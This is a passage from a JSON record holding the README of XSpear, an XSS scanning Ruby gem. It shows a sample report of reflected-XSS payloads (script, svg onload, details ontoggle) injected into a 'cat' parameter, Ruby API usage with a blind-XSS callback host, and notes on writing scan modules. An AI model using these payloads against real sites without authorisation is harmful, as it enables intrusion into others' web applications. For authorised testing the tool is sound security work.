onloadstart=alert(45)\u003e\"},{\"id\":20,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cmarquee onstart=alert(45)\u003e\",\"description\":\"triggered \u003cmarquee onstart=alert(45)\u003e\"},{\"id\":21,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cdetails/open/ontoggle=\\\"alert(45)\\\"\u003e\",\"description\":\"triggered \u003cdetails/open/ontoggle=\\\"alert(45)\\\"\u003e\"},{\"id\":22,\"type\":\"VULN\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cscript\u003ealert(45)\u003c/script\u003e\",\"description\":\"triggered \u003cscript\u003ealert(45)\u003c/script\u003e\"},{\"id\":23,\"type\":\"VULN\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"'\\\"\u003e\u003csvg/onload=alert(45)\u003e\",\"description\":\"triggered \u003csvg/onload=alert(45)\u003e\"}]}\n```\n\n## Usage on ruby code\n```ruby\nrequire 'XSPear'\n\n# Set options\noptions = {}\noptions['thread'] = 30\noptions['cookie'] = \"data=123\"\noptions['blind'] = \"https://hahwul.xss.ht\"\noptions['output'] = json\n\n# Create XSpear object with url, options\ns = XspearScan.new \"https://www.hahwul.com?target_url\", options\n\n# Scanning\ns.run\nresult = s.report.to_json\nr = JSON.parse result\n```\n\n## Add Scanning Module\n**1) Add `makeQueryPattern`**\n```ruby\nmakeQueryPattern('type', 'query,', 'pattern', 'category', \"description\", \"callback funcion\")\n# type: f(ilterd?) r(eflected?) x(ss?)\n# category i(nfo) v(uln) l(ow) m(edium) h(igh) \n\n# e.g \n# makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', \"not filtered \"+\",\".blue, CallbackStringMatch)\n```\n\n**2) if other callback, write callback class override `ScanCallbackFunc`**\ne.g\n```ruby\n class CallbackStringMatch \u003c ScanCallbackFunc\n def run\n if @response.body.include? @query\n [true, \"reflected #{@query}\"]\n else\n [false, \"not reflected #{@query}\"]\n end\n end\n end\n```\n\nParent class(ScanCallbackFunc)\n```ruby\nclass ScanCallbackFunc()\n def initialize(url, method, query, response)\n @url = url\n @method = method\n @query = query\n @response = response\n # self.run\n end\n \n def run\n # override\n end\nend\n```\n\nCommon Callback Class\n- CallbackXSSSelenium\n- CallbackErrorPatternMatch\n- CallbackCheckHeaders\n- CallbackStringMatch\n- CallbackNotAdded\n- etc...\n\n## Update\nif nomal user\n```\n$ gem update XSpear\n```\n\nif developers (soft)\n```\n$ git pull -v\n```\nif develpers (hard)\n```\n$ git reset --hard HEAD; git pull -v\n```\n\n## RubyDoc\nhttps://www.rubydoc.info/gems/XSpear/\n\n## Development\n\nAfter checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.\n\nTo install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).\n\n## Contributing\n\nBug reports and pull requests are welcome on GitHub at https://github.com/hahwul/XSpear. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [Contributor Covenant](http://contributor-covenant.org) code of conduct.\n\n## Donate\n\nI like coffee! I'm a coffee addict.\u003cbr\u003e\n\u003ca href=\"https://www.paypal.me/hahwul\"\u003e\u003cimg src=\"https://www.paypalobjects.com/digitalassets/c/website/logo/full-text/pp_fc_hl.svg\" height=\"50px\"\u003e\u003c/a\u003e\n\u003ca href=\"https://www.buymeacoffee.com/hahwul\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/default-black.png\" alt=\"Buy Me A Coffee\" height=\"50px\"\u003e\u003c/a\u003e\n\n## License\n\nThe gem is available as open source under the terms of the [MIT License](https://opensource.org/licenses/MIT).\n\n## Code of Conduct\n\nEveryone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).\n\n## ScreenShot\n\u003c Scanning Image\u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/71557939-c8c17400-2a90-11ea-9307-6cd9b9736afc.png\" width=100%\u003e\n\u003c CLI-Report 1 \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/71557940-c8c17400-2a90-11ea-90f4-589366f8fba8.png\" width=100%\u003e\n\u003c CLI-Report 2 \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/71557941-c8c17400-2a90-11ea-9cfe-90e9b5d51c34.png\" width=100%\u003e\n\u003c JSON Report \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/63032411-b8996580-bef0-11e9-8aee-0b80fe87f50d.png\" width=100%\u003e\n\u003c HTML Report \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/74363820-b1570400-4e0e-11ea-9ce5-c78319a9d81c.png\" width=100%\u003e\n\n## Video\n[![asciicast](https://asciinema.org/a/290126.svg)](https://asciinema.org/a/290126)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2FXSpear","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhahwul%2FXSpear","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2FXSpear/lists"}